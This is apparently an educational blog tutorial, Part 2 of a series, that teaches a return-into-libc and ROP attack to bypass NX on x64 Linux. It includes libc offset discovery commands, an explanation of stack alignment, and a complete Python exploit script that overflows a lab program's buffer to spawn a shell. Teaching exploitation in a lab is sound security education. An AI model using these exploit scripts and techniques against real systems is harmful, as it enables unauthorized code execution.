Introduction to x64 Linux Binary Exploitation (Part 2)—return into libc
This post is the second in a series of articles describing some basic x64 Linux binary exploitation techniques. In Part 1 I started by disabling ASLR, NX, stack canaries and Fortify. As promised, in this part I will enable NX in order to demonstrate the return-into-libc attack by exploiting a buffer overflow vulnerability.
Definitions
Let's start with some relevant definitions:
Code Reuse Attack: A Code Reuse Attack is an exploitation technique which after gaining control of the instruction pointer, redirects the executable’s control flow to existing code that suits the attacker’s needs.
Return-into-library and Pre-existing Instruction Sequences (gadgets) are examples of this technique.
NX or XD bit: The NX (no-execute) or XD (eXecute Disabled) bit is a technology used in CPUs to segregate areas of memory for use by either storage of processor instructions (code) or for storage of data [1].
As I demonstrated in the previous part, a buffer overflow (BoF) makes it possible to insert arbitrary code into the memory of a program. When these memory areas are explicitly marked as data storage, an attempt to execute the injected code causes an exception. Some Unix operating systems (e.g. OpenBSD, macOS) ship with executable space protection, while newer versions of Microsoft Windows also support executable space protection, called Data Execution Prevention [2].
Return into libc
This attack makes use of code that exists in the always-present C library (libc). For the sake of simplicity, assume that we already have control over the RIP register. Instead of redirecting control to some memory location on the stack, we will force a call to a carefully chosen existing function which serves our needs as an attacker (e.g. to spawn a shell).
As mentioned before, libc is a very popular target for this type of attack: it contains almost every standard C function, and all of these functions can be reached because they are exported. One of these functions is system(), which has the following syntax:
int system(const char *command)
This C library function passes the command or program name specified by the command parameter to the host environment, to be executed by the command processor, and returns after the command has completed. That being said, the following program will simply spawn a shell:
Assuming that by using a vulnerability we are able to overwrite the RIP register, we still have three issues to overcome:
- Find the system() function address
- Pass arguments to this function
- Find the exit() function address, to close the program cleanly
To answer these questions, let’s first see how execution is transferred to the system() function in the context of a valid function call. To do this, compile the program above ($gcc system.c -o system) and load it into the debugger:
Notice the call to the system() function (0x0000000000001158) and, before that, the lea rdi,[rip+0xeac] # 0x2004 instruction. Remember from Part 1 that:
In the C calling convention, the first six integer or pointer arguments are placed in the RDI, RSI, RDX, RCX, R8 and R9 registers, and any additional arguments are placed on the stack.
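The register assignment described above can be sketched as a small helper. This is only an illustration: `assign_arguments` and `ARG_REGISTERS` are hypothetical names, and the model covers integer and pointer arguments only.

```python
# Register order for integer/pointer arguments, as listed above.
ARG_REGISTERS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]


def assign_arguments(args):
    """Split a list of arguments into register and stack placement.

    Hypothetical helper for illustration; it does not model
    floating-point arguments or structures passed by value.
    """
    in_registers = dict(zip(ARG_REGISTERS, args))
    on_stack = list(args[len(ARG_REGISTERS):])
    return in_registers, on_stack


# system() takes a single argument, so only RDI matters for this attack.
regs, stack = assign_arguments(["command_ptr"])
print(regs)   # {'rdi': 'command_ptr'}
print(stack)  # []
```

For the attack this means that controlling RDI alone is enough to choose the command that system() will run.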
In this particular call, a pointer to the string “/bin/sh” is passed in the RDI register. Indeed, by typing x/s 0x2004 (or x/s 0x555555556004 in my case, since I am already running the program) to view the string at this memory location, we get the following output:
Or, in a clearer view:
Back to our vulnerable program from Part 1:
After returning from the greet_me function, the stack must look like the following:
1 → Place enough data to overflow the buffer and overwrite the saved RBP value
2 → Overwrite the saved return address (the value that will be loaded into RIP) so that it points to a POP RDI instruction followed by a RET. This way, whatever is on top of the stack (3, in our case the address of the “/bin/sh” string) is popped into the RDI register, and the RET then pops the next address from the stack into the RIP register.
4 → The stack contains the address of the system() function which will be passed to the RIP (due to the RET from the previous step).
5 → When the system() function returns, the RIP register will point to the exit() function, in order to exit our program cleanly.
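The steps above can be traced with a toy model of the stack. This is a sketch under simplifying assumptions: the values are symbolic labels rather than real addresses, `run_chain` is a hypothetical helper, and the model ignores everything system() and exit() do internally (including the fact that a real call does not preserve RDI).

```python
# Symbolic stand-ins; the real addresses are resolved later in the post.
POP_RDI_RET = "pop_rdi_ret"
BIN_SH = "ptr_to_bin_sh"
SYSTEM = "system"
EXIT = "exit"


def run_chain(stack):
    """Trace a chain built from 'pop rdi; ret' gadgets and function addresses.

    Returns a list of (rip, rdi) pairs, one per address loaded into RIP.
    """
    regs = {"rip": None, "rdi": None}
    trace = []
    sp = 0  # index of the current top of the stack
    while sp < len(stack):
        regs["rip"] = stack[sp]  # ret: pop the next address into RIP
        sp += 1
        if regs["rip"] == POP_RDI_RET:
            regs["rdi"] = stack[sp]  # pop rdi: the next stack item goes to RDI
            sp += 1
            # The gadget's trailing ret is modelled by the next loop iteration.
        trace.append((regs["rip"], regs["rdi"]))
    return trace


# Stack contents placed after the padding and the saved RBP (steps 2 to 5).
for rip, rdi in run_chain([POP_RDI_RET, BIN_SH, SYSTEM, EXIT]):
    print(f"rip={rip:12s} rdi={rdi}")
```

The second entry of the trace is the interesting one: RIP holds the address of system() while RDI already points to “/bin/sh”, which is exactly the state a legitimate call would create.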
For those familiar with binary exploitation, this POP RDI, RET instruction sequence already rings a bell. For the rest of you, here is a relevant definition:
ROP (Return Oriented Programming) techniques aim to hijack a program’s stack (often through a stack-based buffer overflow) to place a carefully crafted sequence of return addresses and data into the stack. At some point after the overflow, the program begins using the attacker-supplied return addresses rather than return addresses placed on the stack by normal program execution. The return addresses the attacker places on the stack point to program memory locations that already contain code as a result of normal program and library loading operations [3].
A ROP gadget is a short sequence of machine instructions, typically ending in a return instruction, which aims to perform a very simple task (e.g. loading a register from the stack). The following simple gadget could be used to initialise RAX on an x86–64 system [3]:
POP RAX ; pop the next item on the stack into RAX
RET ; transfer control to the address contained in the next stack item
A fairly accurate visualisation of the return oriented programming concept is depicted below:
A vulnerable program
Once again we are going to overflow the name buffer as we did in Part 1, with the only difference that this time we are going to use the gets C function, because our input will contain ‘\x00’ bytes. Additionally, we are going to omit the -z execstack parameter during compilation so that the stack is not executable. The compilation command should now look as below:
$gcc -fno-stack-protector vuln.c -o vuln -D_FORTIFY_SOURCE=0
If you recall the previous post, we used 208 bytes to overflow the name buffer + 8 bytes to overwrite the RBP + 8 Bytes to overwrite RIP. The injected code was included in those 208 bytes in addition to a NOP sled of 30 bytes.
Let’s remove the shellcode and NOP sled from the exploitation script since we are not going to use them. The script should look as below:
import sys
import struct

buf = b"A" * 208
buf += b"BBBBBBBB"  # RBP overwrite
buf += struct.pack('<Q', 0x7fffffffde18)  # RIP overwrite

sys.stdout.buffer.write(buf)
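To see why the input necessarily contains zero bytes, it helps to look at what struct.pack produces for a 64-bit address. The sketch below is illustrative only; `packed_address_report` is a hypothetical helper, and the address is simply the value used in the script above.

```python
import struct


def packed_address_report(address):
    """Pack a 64-bit address little-endian and report the bytes that matter."""
    packed = struct.pack("<Q", address)
    return {
        "hex": packed.hex(),
        "zero_bytes": packed.count(0),   # would end a strcpy-style copy early
        "has_newline": b"\n" in packed,  # would make gets() stop reading
    }


report = packed_address_report(0x7fffffffde18)
print(report)
# {'hex': '18deffffff7f0000', 'zero_bytes': 2, 'has_newline': False}
```

The two most significant bytes of the address are zero, so a chain of several such addresses cannot pass through a function that stops copying at the first zero byte. gets() stops at a newline instead, so the only byte to avoid in the payload is 0x0a.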
Crafting the exploit string
Using the stack-map from the previous paragraph, we will start by finding the address of a POP RDI, RET gadget in libc:
- Locate the libc library file:
- Locate the gadget (in libc):
There are various tools that can be used for this purpose; in this case we are going to use Ropper (https://github.com/sashs/Ropper):
Keep a note of the offset 0x26b72 and let’s move to the next step
- Scan the entire libc file for a string “/bin/sh” and print the location of the string in base 16:
$ strings -a -t x /usr/lib/libc.so.6 | grep /bin/sh
1b75aa /bin/sh
Keep a note of the offset 0x1b75aa and let’s move to the next step
- Locate the system() function using readelf:
$ readelf -s libc-2.31.so | grep system
....
1427: 0000000000055410 45 FUNC WEAK DEFAULT 16 system@@GLIBC_2.2.5
Keep a note of the offset 0x55410 and let’s move to the next step
- Similarly to system(), locate the exit() function using readelf:
$ readelf -s libc-2.31.so | grep exit
...
135: 0000000000049bc0 32 FUNC GLOBAL DEFAULT 16 exit@@GLIBC_2.2.5
Keep a note of the offset 0x49bc0 and let’s move to the next step
- Find the base address of the libc library:
As you understand, the offsets that we discovered above will be added to the address where libc is loaded. Since ASLR is disabled, this address will be the same every time we run the vulnerable program, and it can be found by examining the process’s memory mappings:
Keep a note of the base address 0x00007ffff7dc5000
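Before wiring these numbers into the exploit, the absolute addresses can be computed and checked by hand. The sketch below uses only the base address and offsets noted above; `resolve` and the dictionary keys are hypothetical names, and the values are only valid for this particular libc build with ASLR disabled.

```python
LIBC_BASE = 0x00007ffff7dc5000

# Offsets collected in the previous steps (specific to this libc build).
OFFSETS = {
    "pop_rdi_ret": 0x26b72,
    "bin_sh": 0x1b75aa,
    "system": 0x55410,
    "exit": 0x49bc0,
}


def resolve(base, offsets):
    """Turn file offsets into absolute addresses for a given load address."""
    return {name: base + offset for name, offset in offsets.items()}


# A library mapping starts on a page boundary; a base that fails this
# check was probably copied from the wrong line of the memory map.
assert LIBC_BASE % 0x1000 == 0

for name, address in resolve(LIBC_BASE, OFFSETS).items():
    print(f"{name:12s} {address:#x}")
```

Each printed address can then be inspected in the debugger (for example with x/s for the string or x/2i for the gadget) to confirm that it points where expected.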
And let’s now modify the exploit script:
Ignore Lines 5 and 13 for now and notice the buf variable (Lines 11 to 17), which corresponds to the stack map we initially planned. If we try to use this exploit, we will still get a segmentation fault… but not a shell:
The 16 Bytes Stack Alignment
If we debug the vulnerable program using the exploit mentioned above and set a breakpoint at the return instruction of the greet_me function, we have the following:
1 → RBP has been overwritten, 2 → the next instruction (ret) will pop the address at the top of the stack into RIP (3), and the POP RDI, RET gadget will then be executed, placing the address of “/bin/sh” (3) in the RDI register. While everything works as expected, if we let the program continue we land on the following instruction:
The 64 bit calling convention requires the stack to be 16-byte aligned before a call instruction but this is easily violated during ROP chain execution, causing all further calls from that function to be made with a misaligned stack. movaps triggers a general protection fault when operating on unaligned data, so try padding your ROP chain with an extra ret before returning into a function or return further into a function to skip a push instruction [4]. We can find the address of an extra RET instruction in the libc file by following exactly the same process we used for the POP RDI, RET gadget (using ropper or a similar tool). The final exploitation script will be as follows:
import sys
import struct

libc_base_address = 0x7ffff7dc5000
ret = libc_base_address + 0xc0533
pop_rdi = libc_base_address + 0x26b72
bin_sh = libc_base_address + 0x1b75aa
system_function = libc_base_address + 0x55410
exit_function = libc_base_address + 0x49bc0

buf = b"A" * 208
buf += b"BBBBBBBB"
buf += struct.pack('<Q', ret)
buf += struct.pack('<Q', pop_rdi)
buf += struct.pack('<Q', bin_sh)
buf += struct.pack('<Q', system_function)
buf += struct.pack('<Q', exit_function)

sys.stdout.buffer.write(buf)
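Why a single extra RET is enough can be checked with a little arithmetic on RSP. The sketch below is a model only, not something to run against the target: `rsp_mod16_at_entry` is a hypothetical helper, and it assumes that RSP is congruent to 8 modulo 16 at the hijacked ret of greet_me, which holds when the caller kept the stack 16-byte aligned before its call instruction.

```python
def rsp_mod16_at_entry(words_before_function, rsp_mod16_at_ret=8):
    """Return RSP mod 16 at the moment control reaches the target function.

    words_before_function: number of 8-byte chain entries consumed (by ret
        or pop) before the entry that holds the function's address.
    rsp_mod16_at_ret: RSP mod 16 at the hijacked ret (assumed to be 8).
    """
    # Every consumed entry moves RSP up by 8 bytes; the final ret also
    # consumes the entry holding the function address itself.
    consumed = words_before_function + 1
    return (rsp_mod16_at_ret + 8 * consumed) % 16


# A normal call pushes an 8-byte return address onto a 16-byte aligned
# stack, so a function expects RSP mod 16 == 8 on entry.
EXPECTED_AT_ENTRY = 8

without_ret = rsp_mod16_at_entry(2)  # pop_rdi address, bin_sh
with_ret = rsp_mod16_at_entry(3)     # ret address, pop_rdi address, bin_sh

print(without_ret, without_ret == EXPECTED_AT_ENTRY)  # 0 False
print(with_ret, with_ret == EXPECTED_AT_ENTRY)        # 8 True
```

Without the padding, system() starts with RSP shifted by 8 bytes relative to what a normal call would produce, which is what eventually trips movaps. The extra RET consumes one more 8-byte entry and restores the expected value.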
Running the vulnerable program with the output of the final exploit script, we finally get the shell:
Summary
In this part we enabled the NX protection and used a technique known as return into libc to bypass it. In Part 3 we will keep the same level of protection in order to demonstrate an additional bypass technique, which will allow us to execute code on the stack even when NX protection is enabled.
References:
[1] https://en.wikipedia.org/wiki/NX_bit
[2] https://en.wikipedia.org/wiki/Buffer_overflow
[3] The Ghidra Book: The Definitive Guide, Chris Eagle, Kara Nance, September 2020